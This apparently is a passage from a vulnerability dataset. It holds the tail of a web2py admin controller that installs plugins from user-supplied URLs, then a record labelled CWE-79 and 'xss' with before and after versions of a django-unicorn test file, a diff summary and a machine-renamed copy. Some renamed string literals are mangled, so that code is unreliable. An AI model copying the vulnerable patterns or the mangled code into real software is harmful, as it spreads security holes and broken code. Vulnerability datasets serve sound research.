VAR_197.add([apath(VAR_122=request) + VAR_3 + '/*'])
VAR_198 = VAR_197.commit(VAR_26.vars.changelog)
VAR_196 = VAR_195.remotes.origin
VAR_196.push()
session.flash = T(
"Git VAR_195 updated with latest application changes.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_26=form)
def VAR_94():
VAR_3 = request.args(0)
from gluon.serializers import loads_json
if not session.plugins:
try:
VAR_199 = urlopen("http://www.web2pyslices.com/" +
"public/api.json/action/list/content/Package?package" +
"_type=VAR_96&search_index=false").read()
session.plugins = loads_json(VAR_199)
except:
VAR_43.flash = T('Unable to download the list of plugins')
session.plugins = []
return dict(VAR_94=session.plugins["results"], VAR_3=request.args(0))
def FUNC_57():
VAR_3 = request.args(0)
VAR_116 = request.vars.source
VAR_96 = request.vars.plugin
if not (VAR_116 and VAR_3):
raise HTTP(500, T("Invalid request"))
if not VAR_116.lower().split('://')[0] in ('http','https'):
raise HTTP(500, T("Invalid request"))
VAR_26 = SQLFORM.factory()
VAR_110 = None
if VAR_26.process().accepted:
if "web2py.plugin." in VAR_116:
VAR_5 = "web2py.plugin.%VAR_140.w2p" % \
VAR_116.split("web2py.plugin.")[-1].split(".w2p")[0]
else:
VAR_5 = "web2py.plugin.%VAR_140.w2p" % cleanpath(VAR_96)
if plugin_install(VAR_3, urlopen(VAR_116),
request, VAR_5):
session.flash = T('New VAR_96 VAR_212: %s', VAR_5)
else:
session.flash = \
T('unable to install VAR_96 "%s"', VAR_5)
redirect(URL(VAR_221="plugins", VAR_98=[VAR_3, ]))
return dict(VAR_26=form, VAR_3=VAR_3, VAR_96=FUNC_36, VAR_116=source)
| [
1,
2,
5,
10,
22,
31,
34,
35,
43,
48,
52,
56,
57,
60,
61,
64,
65,
74,
75,
79,
82,
90,
91,
98,
99,
106,
107,
116,
117,
120,
136,
141,
145,
158,
159,
162,
165,
168,
177,
178,
185,
186,
188,
210,
211,
214,
216,
217,
219,
221,
229,
240,
243,
245,
260,
275,
277,
287,
291,
295,
313,
315,
321,
324,
329,
330,
347,
348,
351,
362,
371,
372,
386,
387,
391,
396,
399,
410,
411,
415,
422,
428,
445,
447,
448,
460,
461,
464,
471,
492,
493,
501,
503,
504,
520,
521,
528,
529,
535,
538,
541,
555,
572,
573,
587,
589,
594,
595,
603,
606,
608,
609,
612,
613,
617,
630,
631,
634,
641,
643,
646,
647,
654,
666,
668,
676,
689,
690,
701,
716,
720,
741,
743,
744,
752,
773,
783,
795,
796,
815,
825,
853,
854,
861,
866,
869,
883,
885,
886,
891,
900,
902,
903,
907,
909,
917,
919,
922,
923,
934,
936,
940,
942,
950,
955,
962,
964,
965,
972,
976,
980,
990,
992,
999,
1000,
1002,
1008,
1023,
1024,
1033,
1035,
1038,
1045,
1055,
1060,
1075,
1076,
1080,
1084,
1085,
1089,
1093,
1096,
1110,
1111,
1112,
1117,
1118,
1126,
1127,
1139,
1140,
1149,
1152,
1155,
1156,
1160,
1161,
1165,
1166,
1171,
1172,
1177,
1178,
1179,
1187,
1189,
1196,
1211,
1212,
1218,
1222,
1241,
1242,
1247,
1251,
1252,
1253,
1258,
1259,
1267,
1268,
1280,
1281,
1292,
1295,
1296,
1300,
1301,
1305,
1306,
1311,
1312,
1316,
1317,
1318,
1322,
1326,
1340,
1341,
1358,
1366,
1367,
1368,
1369,
1371,
1372,
1373,
1374,
1375,
1377,
1378,
1379,
1380,
1381,
1384,
1386,
1394,
1399,
1401,
1404,
1407,
1409,
1411,
1414,
1417,
1420,
1424,
1428,
1431,
1445,
1449,
1452,
1455,
1457,
1458,
1460,
1466,
1469,
1472,
1475,
1478,
1494,
1498,
1509,
1510,
1516,
1517,
1522,
1523,
1540,
1541,
1550,
1555,
1558,
1561,
1564,
1567,
1570,
1573,
1576,
1589,
1591,
1592,
1598,
1610,
1613,
1618,
1620,
1635,
1637,
1651,
1654,
1656,
1660,
1665,
1667,
1672,
1690,
1695,
1710,
1713,
1714,
1723,
1725,
1726,
1734,
1750,
1751,
1755,
1760,
1769,
1770,
1773,
1775,
1776,
1778,
1780,
1783,
1788,
1792,
1794,
1796,
1797,
1800,
1803,
1805,
1808,
1810,
1811,
1814,
1818,
1824,
1833,
1834,
1837,
1841,
1857,
1858,
1862,
1863,
1866,
1871,
1872,
1880,
1881,
1886,
1887,
1895,
1896,
1911,
1912,
1913,
1914,
1915,
1916,
1917,
1934,
1951,
1952,
1978,
1979,
1993,
1994,
2001,
2007,
2021,
119,
161,
180,
213,
523,
531,
575,
597,
633,
856,
857,
905,
906,
967,
1026,
1078,
1087,
1214,
1244,
1343,
1543,
1594,
1753,
1772,
1799,
1813,
1836,
1860,
1865,
1883,
1919,
1954,
921,
938,
1802,
1807
] | [
1,
2,
5,
10,
22,
31,
34,
35,
43,
48,
52,
56,
57,
60,
61,
64,
65,
74,
75,
79,
82,
90,
91,
98,
99,
106,
107,
116,
117,
120,
136,
141,
145,
158,
159,
162,
165,
168,
177,
178,
185,
186,
188,
210,
211,
214,
216,
217,
219,
221,
229,
240,
243,
245,
260,
275,
277,
287,
291,
295,
313,
315,
321,
324,
329,
330,
347,
348,
351,
362,
371,
372,
386,
387,
391,
396,
399,
410,
411,
415,
422,
428,
445,
447,
448,
460,
461,
464,
471,
492,
493,
501,
503,
504,
520,
521,
528,
529,
535,
538,
541,
555,
572,
573,
587,
589,
594,
595,
603,
606,
608,
609,
612,
613,
617,
630,
631,
634,
641,
643,
646,
647,
654,
666,
668,
676,
689,
690,
701,
716,
720,
741,
743,
744,
752,
773,
783,
795,
796,
815,
825,
853,
854,
861,
866,
869,
883,
885,
886,
891,
900,
902,
903,
907,
909,
917,
919,
922,
923,
934,
936,
940,
942,
950,
955,
962,
964,
965,
972,
976,
980,
990,
992,
999,
1000,
1002,
1008,
1023,
1024,
1033,
1035,
1038,
1045,
1055,
1060,
1075,
1076,
1080,
1084,
1085,
1089,
1093,
1096,
1110,
1111,
1112,
1117,
1118,
1126,
1127,
1139,
1140,
1149,
1152,
1155,
1156,
1160,
1161,
1165,
1166,
1171,
1172,
1177,
1178,
1179,
1187,
1189,
1196,
1211,
1212,
1218,
1222,
1241,
1242,
1247,
1251,
1252,
1253,
1258,
1259,
1267,
1268,
1280,
1281,
1292,
1295,
1296,
1300,
1301,
1305,
1306,
1311,
1312,
1316,
1317,
1318,
1322,
1326,
1340,
1341,
1358,
1366,
1367,
1368,
1369,
1371,
1372,
1373,
1374,
1375,
1377,
1378,
1379,
1380,
1381,
1384,
1386,
1394,
1399,
1401,
1404,
1407,
1409,
1411,
1414,
1417,
1420,
1424,
1428,
1431,
1445,
1449,
1452,
1455,
1457,
1458,
1460,
1466,
1469,
1472,
1475,
1478,
1494,
1498,
1509,
1510,
1516,
1517,
1522,
1523,
1540,
1541,
1550,
1555,
1558,
1561,
1564,
1567,
1570,
1573,
1576,
1589,
1591,
1592,
1598,
1610,
1613,
1618,
1620,
1635,
1637,
1651,
1654,
1656,
1660,
1665,
1667,
1672,
1690,
1695,
1710,
1713,
1714,
1723,
1725,
1726,
1734,
1750,
1751,
1755,
1760,
1769,
1770,
1773,
1775,
1776,
1778,
1780,
1783,
1788,
1792,
1794,
1796,
1797,
1800,
1803,
1805,
1808,
1810,
1811,
1814,
1818,
1824,
1833,
1834,
1837,
1841,
1857,
1858,
1862,
1863,
1866,
1871,
1872,
1880,
1881,
1886,
1887,
1895,
1896,
1911,
1912,
1913,
1914,
1915,
1916,
1917,
1934,
1951,
1952,
1978,
1979,
1993,
1994,
2001,
2007,
2021,
119,
161,
180,
213,
523,
531,
575,
597,
633,
856,
857,
905,
906,
967,
1026,
1078,
1087,
1214,
1244,
1343,
1543,
1594,
1753,
1772,
1799,
1813,
1836,
1860,
1865,
1883,
1919,
1954,
921,
938,
1802,
1807
] |
1CWE-79
| import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class FakeComponentParent(UnicornView):
template_name = "templates/test_component_parent.html"
class FakeComponentKwargs(UnicornView):
template_name = "templates/test_component_kwargs.html"
hello = "world"
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.hello = kwargs.get("test_kwarg")
class FakeComponentModel(UnicornView):
template_name = "templates/test_component_model.html"
model_id = None
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.model_id = kwargs.get("model_id")
class FakeComponentCalls(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall")
class FakeComponentCalls2(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall2", "hello")
def test_unicorn_render_kwarg():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
unicorn_node = unicorn(None, token)
context = {}
actual = unicorn_node.render(context)
assert "->tested!<-" in actual
def test_unicorn_render_context_variable():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
unicorn_node = unicorn(None, token)
context = {"test_var": {"nested": "variable!"}}
actual = unicorn_node.render(context)
assert "->variable!<-" in actual
def test_unicorn_render_parent(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert unicorn_node.parent
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def test_unicorn_render_parent_with_key(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view key='blob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def test_unicorn_render_parent_with_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view id='flob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def test_unicorn_render_parent_with_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view pk=99",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def test_unicorn_render_parent_with_model_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
# Fake a model that only has an id
class Model:
def __init__(self):
self.id = 178
def to_json(self):
return {"id": self.id}
context = {"view": view, "model": Model()}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def test_unicorn_render_parent_with_model_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
flavor = Flavor(pk=187)
context = {"view": view, "model": flavor}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def test_unicorn_render_id_use_pk():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' model_id=model.id",
)
unicorn_node = unicorn(None, token)
context = {"model": {"pk": 123}}
actual = unicorn_node.render(context)
assert "==123==" in actual
def test_unicorn_render_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_child_component_no_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
html = unicorn_node.render(context)
assert "<script" not in html
def test_unicorn_render_parent_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_calls(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall","args":[]}]' in html
def test_unicorn_render_calls_with_arg(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in html
def test_unicorn_render_calls_no_mount_call(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[]' in html
def test_unicorn_render_hash(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"hash":"' in html
# Assert that the content hash is correct
script_idx = html.index("<script")
rendered_content = html[:script_idx]
expected_hash = generate_checksum(rendered_content)
assert f'"hash":"{expected_hash}"' in html
| import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class FakeComponentParent(UnicornView):
template_name = "templates/test_component_parent.html"
class FakeComponentKwargs(UnicornView):
template_name = "templates/test_component_kwargs.html"
hello = "world"
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.hello = kwargs.get("test_kwarg")
class FakeComponentKwargsWithHtmlEntity(UnicornView):
template_name = "templates/test_component_kwargs_with_html_entity.html"
hello = "world"
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.hello = kwargs.get("test_kwarg")
class FakeComponentModel(UnicornView):
template_name = "templates/test_component_model.html"
model_id = None
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.model_id = kwargs.get("model_id")
class FakeComponentCalls(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall")
class FakeComponentCalls2(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall2", "hello")
def test_unicorn_render_kwarg():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
unicorn_node = unicorn(None, token)
context = {}
actual = unicorn_node.render(context)
assert "<b>tested!</b>" in actual
def test_unicorn_render_context_variable():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
unicorn_node = unicorn(None, token)
context = {"test_var": {"nested": "variable!"}}
actual = unicorn_node.render(context)
assert "<b>variable!</b>" in actual
def test_unicorn_render_with_invalid_html():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargsWithHtmlEntity' test_kwarg=test_var.nested",
)
unicorn_node = unicorn(None, token)
context = {"test_var": {"nested": "variable!"}}
actual = unicorn_node.render(context)
assert "->variable!<-" in actual
def test_unicorn_render_parent(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert unicorn_node.parent
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def test_unicorn_render_parent_with_key(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view key='blob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def test_unicorn_render_parent_with_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view id='flob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def test_unicorn_render_parent_with_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view pk=99",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def test_unicorn_render_parent_with_model_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
# Fake a model that only has an id
class Model:
def __init__(self):
self.id = 178
def to_json(self):
return {"id": self.id}
context = {"view": view, "model": Model()}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def test_unicorn_render_parent_with_model_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
flavor = Flavor(pk=187)
context = {"view": view, "model": flavor}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def test_unicorn_render_id_use_pk():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' model_id=model.id",
)
unicorn_node = unicorn(None, token)
context = {"model": {"pk": 123}}
actual = unicorn_node.render(context)
assert "==123==" in actual
def test_unicorn_render_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_child_component_no_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
html = unicorn_node.render(context)
assert "<script" not in html
def test_unicorn_render_parent_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_calls(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall","args":[]}]' in html
def test_unicorn_render_calls_with_arg(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in html
def test_unicorn_render_calls_no_mount_call(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[]' in html
def test_unicorn_render_hash(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"hash":"' in html
# Assert that the content hash is correct
script_idx = html.index("<script")
rendered_content = html[:script_idx]
expected_hash = generate_checksum(rendered_content)
assert f'"hash":"{expected_hash}"' in html
| xss | {
"code": [
" assert \"->tested!<-\" in actual",
" assert \"->variable!<-\" in actual"
],
"line_no": [
58,
70
]
} | {
"code": [
"class FakeComponentKwargsWithHtmlEntity(UnicornView):",
" template_name = \"templates/test_component_kwargs_with_html_entity.html\"",
" hello = \"world\"",
" def __init__(self, *args, **kwargs):",
" super().__init__(**kwargs)",
" self.hello = kwargs.get(\"test_kwarg\")",
" assert \"<b>tested!</b>\" in actual",
" assert \"<b>variable!</b>\" in actual",
"def test_unicorn_render_with_invalid_html():",
" TokenType.TEXT,",
" \"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargsWithHtmlEntity' test_kwarg=test_var.nested\",",
" )",
" unicorn_node = unicorn(None, token)",
" context = {\"test_var\": {\"nested\": \"variable!\"}}",
" assert \"->variable!<-\" in actual"
],
"line_no": [
26,
27,
28,
30,
31,
32,
67,
79,
82,
84,
85,
86,
87,
88,
91
]
} | import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class CLASS_0(UnicornView):
VAR_1 = "templates/test_component_parent.html"
class CLASS_1(UnicornView):
VAR_1 = "templates/test_component_kwargs.html"
VAR_2 = "world"
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.hello = VAR_4.get("test_kwarg")
class CLASS_2(UnicornView):
VAR_1 = "templates/test_component_model.html"
VAR_5 = None
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.model_id = VAR_4.get("model_id")
class CLASS_3(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_16(self):
self.call("testCall")
class CLASS_4(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_16(self):
self.call("testCall2", "hello")
def FUNC_0():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_9 = VAR_7.render(VAR_8)
assert "->tested!<-" in VAR_9
def FUNC_1():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"test_var": {"nested": "variable!"}}
VAR_9 = VAR_7.render(VAR_8)
assert "->variable!<-" in VAR_9
def FUNC_2(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert VAR_7.parent
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def FUNC_3(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 key='blob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def FUNC_4(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 id='flob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def FUNC_5(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 pk=99",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def FUNC_6(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
class CLASS_5:
def __init__(self):
self.id = 178
def FUNC_17(self):
return {"id": self.id}
VAR_8 = {"view": VAR_10, "model": CLASS_5()}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def FUNC_7(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_11 = Flavor(pk=187)
VAR_8 = {"view": VAR_10, "model": VAR_11}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def FUNC_8():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' VAR_5=model.id",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"model": {"pk": 123}}
VAR_9 = VAR_7.render(VAR_8)
assert "==123==" in VAR_9
def FUNC_9(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_10(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_12 = VAR_7.render(VAR_8)
assert "<script" not in VAR_12
def FUNC_11(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_12(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
